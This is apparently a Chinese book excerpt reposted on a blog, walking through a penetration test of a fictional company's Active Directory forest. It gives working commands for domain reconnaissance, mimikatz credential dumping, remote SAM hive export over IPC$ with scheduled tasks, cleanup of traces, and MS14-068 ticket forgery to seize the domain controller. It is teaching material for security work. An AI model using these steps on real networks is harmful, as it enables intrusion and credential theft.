实战某大型连锁企业域渗透

点击星标,即时接收最新推文

451206509704acfe5400e49465946f20.png

本文选自《内网安全攻防:红队之路》

扫描二维码五折购书

实战域渗透测试流程 

对黑客来说,拿下域控制器是终极目标。然而攻击者空间是如何通过采取信息收集、权限提升、横向移动等一系列手段,从而一步步拿下域控制器的呢?本次将从一张拓扑图开始,和大家一起梳理域的相关知识,并串联内网的各类攻击技术。

实验环境概述  

下图是一张某公司(虚构名:北京test公司)的网络拓扑示意图。该公司员工众多,需要共享复杂的内网资源,为此特意架设了一套域环境test.com,即企业内网上方的部分。域内部署了1台域控制器,用来负责对域内权限和资源管理,并提供DNS服务器功能。下设办公室、生产部2个部门,拥有不同的IP地址网段。

随着公司的日益壮大,又在海南开了1家分公司,考虑到网络规模和节省带宽的需要,以及为了进一步方便对分公司的网络进行管理规划,又在分公司单独搭建了一个子域网络sub.test.com,即企业内网下方的部分。域内部署了1台子域控制器,下设商务部、生产部2个部门,拥有不同的IP地址网段。

假设攻击者拿下了子域的1台商务部计算机pc.sub.test.com,本章的目标是通过该计算机拿下子域控制器,并实施相关操作获取所有子域用户的用户名和密码散列值。   

bb4c337887f2f3243669a7ec013fd892.png

域网络拓扑示意图

1. 北京TEST公司网络配置

域控制器相关配置:

  • 域名:test.com

  • 操作系统:Windows Server 2008

  • 域服务:AD域+DNS服务

  • 计算机名:testdc.test.com

  • 登录用户:bjadmin01

  • IP地址:10.1.1.100

  • DNS1:114.114.114.114(域控制器IP地址)

办公室计算机相关配置:

  • 域名:test.com   

  • 操作系统:Windows 7

  • 域服务:无

  • 计算机名:bgs.test.com

  • 登录用户:testuser1

  • IP地址:10.1.1.5

  • DNS1地址:10.1.1.100(主域控制器IP地址)

生产部计算机配置:

  • 域名:test.com

  • 操作系统:Windows 7

  • 域服务:无

  • 计算机名:scb.test.com

  • 登录用户:testuser2

  • IP地址:10.1.1.6

  • DNS1地址:10.1.1.100(主域控制器IP地址)

2. 海南TEST子公司网络

子域控制器配置:

  • 域名:sub.test.com

  • 操作系统:Windows Server 2012

  • 域服务:AD域+DNS服务

  • 计算机名:dc.sub.test.com

  • 登录用户:hnadmin01 IP

  • 地址:192.168.1.100

  • DNS1: 192.168.1.100(海南子域控制器IP地址)

  • DNS2: 10.1.1.100(北京父域域控制器IP地址)

商务部计算机配置:

  • 域名:sub.test.com

  • 操作系统:Windows 7

  • 域服务:无

  • 计算机名:pc.sub.test.com

  • 登录用户:hnwangwu

  • IP地址:192.168.1.5

  • DNS1: 192.168.1.100(海南子域控制器IP地址)

生产部计算机配置:  

  • 域名:sub.test.com

  • 操作系统:Windows 7

  • 域服务:无

  • 计算机名:pc2.sub.test.com

  • 登录用户:hnzhaoliu

  • IP地址:192.168.1.6

  • DNS1: 192.168.1.100(海南子域控制器IP地址)


实战渗透测试思路简介 

在实战中,由于分公司的员工网络安全意识存在不足,所以攻击者所拿下的第1台内网计算机往往都在子域中。本节假设因为海南子公司的相关人员安全意识不足,下载安装了恶意木马程序,导致一台子域普通计算机(主机名为pc.sub.test.com)被攻击者成功钓鱼并控制。

接下来,攻击者的目标就是利用这台子域的普通计算机为跳板,攻破子域的域控制器。

1. 信息收集

信息收集是内网渗透测试的第一步,通过了解所控制计算机的本机信息以及所处域网络的相关情况,来做到知己知彼。

第1步,收集本机的信息。

输入ipconfig /all命令,查看到本机的主机名为PC,IP地址是192.168.1.5,特别是在DNS后缀列表处可以看到sub.test.com,由此确定主机所处的是域环境。

输入systeminfo命令,可以看到本机的操作系统版本为Windows 7。

输入whoami命令,显示当前的登录用户,返回结果看到登录用户名称,在域环境下一般是域用户,这里是sub\hnwangwu。

输入net user hnwangwu/domain来查看用户权限,这里显示的是Domain Users,为普通域用户。如果在全局组成员处显示的是Domain Admins,那么恭喜你,直接拿下了域管理员账户。

ipconfig /all
# 获取主机名、IP地址、域名等信息
systeminfo
# 获取操作系统和安装补丁等信息
whoami
# 获取当前登录用户名   
net user hnwangwu /domain
# 获取域用户hnwangwu在内网的权限

第2步,搜集域的相关信息。

前面明确了当前计算机所处为域环境,接下来可以进行域内相关信息的收集了。

输入net group groupname /domain可以查询域内组账户相关信息。一般比较常用groupname包括Domain Admins、Domain Controllers、Domain Users、Domain Computers等4个组,分别输入如下信息进行组账户查询。

net group "Domain Admins" /domain
#显示所有域管理员账户,这里为hnadmin01
net group "Domain Controllers" /domain
#显示所有域控制器服务器名: dc.sub.test.com
net group "Domain Computers" /domain
#显示所有域内计算机名: dc.sub.test.com、pc.sub.test.com、pc2.sub.test.com
net group "Domain Users" /domain
#显示所有域用户:hnadmin01、hnwangwu、hnzhaolliu

以上命令查看的是本域的相关信息,是否存在域林以及其它相关情况,可输入如下命令进行查询。

net view /domain
# 该命令用来查询域,显示结果分别为:test.com、sub.test.com、workgroup

Workgroup是工作组,其它两个结果都是域名称,从名称就可以判断出该公司存在域林,父域名为test.com。

再使用如下命令,来查看其父域的相关信息。

net view /domain:test
# 查询父域的计算机情况:显示为dc.test.com、bgs.test.com、scb.test.com

通过上述信息收集,攻击者能够初步判断出当前所处网络环境,这为后续的进一步渗透测试指明了方面,具体信息如下:

一是实现了对当前攻击者所控制的域计算机角色判断。获取到包括主机名、操作系统、IP地址等信息。

二是进一步分析了计算所处网络环境的拓扑结构。可以看出,该计算机处于域环境中,所在域部署有1台域控制器和2台普通域计算机;有3个域用户,其中1个是域管理员。

三是当前域所处网络环境有了初步判断。可以根据查询域的相关信息得出当前域是域林中的子域,该域林包括1个父域和1个子域,父域名为test.com。   

2. 本机密码抓取

攻击者最常用的1个攻击者法,就是在所攻破的计算机上抓取所有登录过的用户名和密码,如果域管理员恰好通过runas或者远程桌面等登录过该计算机,那么攻击者可以直接获取到域管理员用户权限。

具体操作如下:

使用mimikatz,其下载地址为:https://github.com/gentilkiwi/mimikatz,解压缩后的目录结构如图所示。

41e39139f3f1242578442ce1ca3aa737.png

mimikatz目录结构

以管理员权限运行mimikatz.exe,在界面中输入如下命令获取曾经登录到该计算机的用户名及明文密码。

privilege::debug      //提升权限
sekurlsa::logonpasswords           //抓取密码

对抓取到的用户名及其密码进行分析,因为分公司往往网络安全管理往往比较混乱,所以获取到其它域用户密码的可能性较大,这里假设攻击者拿到了域用户hnzhaoliu的密码password。

提醒各位读者,很多企业内网的计算机所安装使用的操作系统是同一个模板,因此它们的本地管理员administrator的密码也都是一样的,若内网未禁用本地管理员用户的远程登录权限,那么就可以用获取到的本地管理员密码来远程登录其它计算机,甚至包括域控制器。

3. 定位用户登录机器

对于拿到的域用户hnzhaoliu,通过命令net user hnzhaoliu /domain命令,可以知道它只是一个普通域用户,那么它在哪台机器上有登录权限呢?

内网攻击的过程中,看起来攻击者是在内网到处横移,流程非常复杂混乱,但其实他们事先借助了定位工具帮助自己查看哪些机器当前账号能够有权限访问。例如使用微软官方提供的PsLoggedon工具,能够查询到该用户能够登录机器pc2.sub.test.com,这为我们下一步横向移动提供了方向,具体命令如下。   

PsLoggedon.exe \\pc2
# \\可以查询到该机器登录用户为hnzhaoliu

4. 通过IPC远程连接执行命令

利用获取到的hnzhaoliu的密码,通过IPC远程连接目标计算机,执行上传、下载操作,运行相关命令,进而获取到目标计算机的密码。

首先建立ipc远程连接。

net use \\pc2\ipc$ "password" /user:sub.test.com\hnzhaoliu
# ipc$: 建立ipc$连接
# “password”:用户明文密码
# /user: 后面跟着域名\域用户名

新建一个批处理脚本,通过使用注册表方法来远程导出目标计算机的SAM文件,脚本中输入如下命令,并将其命名为runsam.bat。

reg save HKLM\SAM sam.hiv
reg save HKLM\SYSTEM system.hiv
exit

接下来,在命令行中使用如下命令将批处理runsam.bat拷贝至目标计算机。

copy runsam.bat \\pc2\C$\windows\temp\

继续在命令行中输入如下命令,通过at指令创建远程计算机pc2的计划任务,使其在指定时间运行该批处理。

at \\pc2 10:10 c:\windows\temp\runsam.bat

批处理被执行后,会在批处理的目录下生成两个相关文件,将这两个文件从目标计算机pc2拷贝到本机。

copy \\pc2\C$\windows\temp\sam.hiv
copy \\pc2\C$\windows\temp\system.hiv

记得清除相关攻击记录,删除批处理脚本及其生成的两个文件,断开和远程计算机pc2的IPC$连接。

del \\PC2\C$\windows\temp\runsam.bat
del \\PC2\C$\windows\temp\sam.hiv
del \\PC2\C$\windows\temp\system.hiv
# 删除runsam.bat、sam.hiv、system.hiv
net use \\PC2\ipc$ /del /y
# 删除ipc$连接

重新以管理员权限运行mimikatz,使用如下命令破解SAM文件密码。需要注意,为确保破解成功,要将system.hiv、sam.hiv这两个文件和mimikatz放在同一个目录中。   

lsadump::sam /sam:sam.hiv /system:system.hiv

在域计算机pc2.sub.test.com上获取到了hnzhaoliu的密码,但没有域管理员密码,所以攻击者继续采取其它措施来获取域控制器的权限了。

5. 利用域用户提权漏洞来拿下域控制器

在存在MS14-068漏洞的情况下,可以实施提权攻击。简单来说,通过PyKEK工具的ms14-068.py脚本生成一个域管理员权限的服务票据,通过票据登录域控制器。

ms14-068.py的使用参数如下所示:

  • -u@:用户名@域名

  • -s:用户SID

  • -d:域控制器名.域名

  • -p:明文密码

  • --rc4:在没有明文密码的情况下,通过NTLM散列值登录。

使用PyKEK生成高权限票据的命令格式如下:

python ms14-068.py -u hnzhaoliu@sub.test.com –p password -s S-1-5-21-4223730591-2862776806-5164649606-2215 –d dc.sub.test.com

再打开mimikatz,输入命令“kerberos::purge”,清除内存中已有的票据信息,如图所示。

59bbffea1a71ac6386041f7c01b21d49.png

清除内存中的票据

在mimikatz中输入如下命令将伪造的票据注入内存,如图所示,注入内存成功。

kerberos::ptc "TGT_hnzhaoliu@sub.test.com.ccache"

d6c089653f1a69261ee3728d42206889.png

将高权限票据注入内存  

使用dir命令,列出域控制器C盘的内容,列出目录成功,表示成功拿下了域控制器权限。

b958c456df6b5896724e8518b68a5f93.png

验证权限

综上所述,围绕获取域控制器的登录权限介绍了两种方法:一种通过在不同的域计算机上持续的权限验证和横向移动,寻找域用户相关登录情况,直至获取到域管理员权限。二是通过权限提升漏洞将普通域用户提升为域管理员权限,除此以外还有第三种思路,就是攻击者可以利用域控制器系统漏洞直接登录到域控制器,比如近年来广泛使用的大杀器ZeroLogon漏洞。

简而言之:域控制器安全任重道远。

—  实验室旗下直播培训课程  —

43b9bb434a7d73591b83d292087d923c.png

32fd3d987bb13eb6852837a3b70ebec7.jpeg

5ede9002a72ff32d03ef2c9662d802d2.jpeg9e81d6a51b0653572672c531cb299f01.png

9eeed1e4200e4b4cf586c32308d173e2.png

3b7e66d76119ea1d50f4a3e53101d423.jpeg

4c597037f81b755dba2c884129ea2d14.jpeg

60c7ec8ef9be746380ca4980fa7060fc.jpeg

6f382d1937588687ad50017d92e5de31.png

和20000+位同学加入MS08067一起学习

de3ed9e4e6aa354c3dd80a8e8aa0a968.gif

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/867862.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

《基于 defineProperty 实现前端运行时变量检测》

📢 大家好,我是 【战神刘玉栋】,有10多年的研发经验,致力于前后端技术栈的知识沉淀和传播。 💗 🌻 近期刚转战 CSDN,会严格把控文章质量,绝不滥竽充数,欢迎多多交流~ &am…

STM32CubeMX实现4X5矩阵按键(HAL库实现)

为了实现计算器键盘,需要使用4X5矩阵按键,因此,我在4X4矩阵键盘上重新设计了一个4X5矩阵按键。原理图如下: 原理描述: 4X5矩阵按键,可以设置4个引脚为输出,5个引脚为输入模式,4个引…

【云原生】Prometheus监控Docker指标并接入Grafana

目录 一、前言 二、docker监控概述 2.1 docker常用监控指标 2.2 docker常用监控工具 三、CAdvisor概述 3.1 CAdvisor是什么 3.2 CAdvisor功能特点 3.3 CAdvisor使用场景 四、CAdvisor对接Prometheus与Grafana 4.1 环境准备 4.2 docker部署CAdvisor 4.2.2 docker部署…

【Java探索之旅】初识多态_概念_实现条件

文章目录 📑前言一、多态1.1 概念1.2 多态的实现条件 🌤️全篇总结 📑前言 多态作为面向对象编程中的重要概念,为我们提供了一种灵活而强大的编程方式。通过多态,同一种操作可以应用于不同的对象,并根据对象…

el-table 树形数据与懒加载 二级数据不展示

返回的数据中 children和hasChildren只能有一个,不能同时存在,否则加载数据会失败

零基础STM32单片机编程入门(八)定时器PWM输入实战含源码视频

文章目录 一.概要二.PWM输入框架图三.CubeMX配置一个PWM输入例程1.硬件准备2.创建工程3.调试 四.CubeMX工程源代码下载五.讲解视频链接地址六.小结 一.概要 脉冲宽度调制(PWM),是英文“Pulse Width Modulation”的缩写,简称脉宽调制,是利用单…

手把手搭建微信机器人,帮你雇一个24小时在线的个人 AI 助理(上)

上一篇,带领大家薅了一台腾讯云服务器:玩转云服务:手把手带你薅一台腾讯云服务器,公网 IP。 基于这台服务器,今天我们一起动手捏一个基于 LLM 的微信机器人。 0. 前置准备 除了自己常用的微信账号以外,还…

盘点8款国内顶尖局域网监控软件(2024年国产局域网监控软件排名)

局域网监控软件对于企业网络管理至关重要,它们可以帮助IT部门维护网络安全,优化网络性能,同时监控和控制内部员工的网络使用行为。以下是八款备受推崇的局域网监控软件,每一款都有其独特的优势和适用场景。 1.安企神软件 试用版领…

VSCode远程服务器如何上传下载文件(超方便!)

方法一: 1、在VSCode应用商店安装SFTP插件 2、然后就可以直接把文件拖进VSCode即可,如下图所示: 这里的目录是我远程服务器上的目录,可以直接将要上传的文件直接拖进需要的文件夹 3、如果要从远程服务器上下载文件到本地&#x…

安装Gradle

官网文档 https://gradle.org/ 腾讯下载镜像:https://mirrors.cloud.tencent.com/gradle/ 文档:https://docs.gradle.org/current/userguide/userguide.html 命令行文档:https://docs.gradle.org/current/userguide/command_line_interface.…

Java高级重点知识点-21-IO、字节流、字符流、IO异常处理、Properties中的load()方法

文章目录 IOIO的分类 字节流字节输出流【OutputStream】字节输入流【InputStream】图片复制 字符流字符输入流【FileReader】字符输出流【FileWriter】 IO异常的处理(扩展知识)Properties属性集(java.util) IO Java中I/O操作主要是指使用 java.io 包下的…

《侃侃而谈 · 关于接外单的一些事》

📢 大家好,我是 【战神刘玉栋】,有10多年的研发经验,致力于前后端技术栈的知识沉淀和传播。 💗 🌻 CSDN入驻不久,希望大家多多支持,后续会继续提升文章质量,绝不滥竽充数…

期末成绩发布方式

期末考试结束后,成绩单的发放总是让老师们头疼不已。想象一下,每个学生的成绩都需要老师一个个私信给家长,不仅耗时耗力,而且极易出错。 在传统的成绩单发放方式中,老师往往需要通过电子邮件、短信或者微信等方式&…

【Rust基础入门】Hello Cargo

文章目录 前言Cargo是什么?Cargo的作用查看cargo版本使用cargo创建项目Cargo.toml文件cargo build命令cargo runcargo check为发布构建 总结 前言 在Rust编程中,Cargo扮演着至关重要的角色。它是Rust的包管理器,负责处理许多任务&#xff0c…

【TB作品】51单片机 Proteus仿真 00002仿真-智能台灯色调倒计时光强

实验报告:基于51单片机的智能台灯控制系统 背景 本实验旨在设计一个基于51单片机的智能台灯控制系统,该系统可以通过按键进行手动控制,并能根据环境光强度自动调节台灯亮度。此外,系统还具备倒计时关灯功能。 器件连接 51单片…

软件运维服务方案(Word原件2024)

软件运维服务方案(Word原件) 1. 服务简述 我们提供全面的软件运维服务,确保软件系统的稳定运行。 1.1 服务内容 包括监控、维护、故障排查与优化。 1.2 服务方式 结合远程与现场服务,灵活响应客户需求。 1.3 服务要求 高效响应&am…

双向DFS——AcWing 171. 送礼物

双向DFS 定义 双向深度优先搜索(Bi-directional Depth First Search, BD-DFS)是一种在图或树中寻找两点间路径的算法。与传统的单向DFS不同,BD-DFS同时从起始节点和目标节点出发进行搜索,使用两个DFS过程。一个向前探索从起点到…

从一个(模型设计的)想法到完成模型验证的步骤

从有一个大型语言模型(LLM)设计的想法到完成该想法的验证,可以遵循以下实践步骤: 需求分析: 明确模型的目的和应用场景。确定所需的语言类型、模型大小和性能要求。分析目标用户群体和使用环境。 文献调研&#xff1a…

swiftui中常用组件picker的使用,以及它的可选样式

一个可选项列表就是一个picker组件搞出来的,它有多个样式可以选择,并且可以传递进去一些可选数据,有点像前端页面里面的seleted组件,但是picker组件的样式可以更多。可以看官方英文文档:PickerStyle | Apple Developer…

【对接支付宝支付详细流程】

下面示例使用的是支付宝的网页支付,最终的效果如图: 1.前置条件 对接支付宝你需要了解的知识点 1.加密算法 对称加密和非对称加密,RSA2加密算法,签名验证 2.支付宝平台openid unionId的概念 https://opendocs.alipay.com/pre…